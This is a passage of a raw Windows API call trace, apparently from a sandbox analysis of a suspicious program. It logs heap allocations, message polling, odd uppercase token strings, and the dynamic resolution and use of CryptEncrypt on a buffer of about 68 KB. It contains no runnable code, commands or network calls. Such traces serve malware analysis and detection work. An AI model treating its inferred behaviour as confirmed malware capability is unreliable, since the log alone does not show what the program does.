(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d3b80 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.369] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa280, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.371] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0161.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.372] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x10c90, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x10c98) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.373] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.373] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.374] CharLowerBuffW (in: lpsz="byte[68760]", cchLength=0xb | out: lpsz="byte[68760]") returned 0xb [0161.374] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.375] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.375] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.375] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.375] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.375] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.375] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0161.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.376] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d3b80*, pdwDataLen=0x8bef68*=0x10c90, dwBufLen=0x10c98 | out: pbData=0x34d3b80*, pdwDataLen=0x8bef68*=0x10c98) returned 1 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0161.377] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.378] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.378] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.378] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.379] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.379] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.379] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.380] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.380] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.380] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.380] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.380] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.381] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.381] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.381] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.381] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.381] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.381] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.382] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.382] 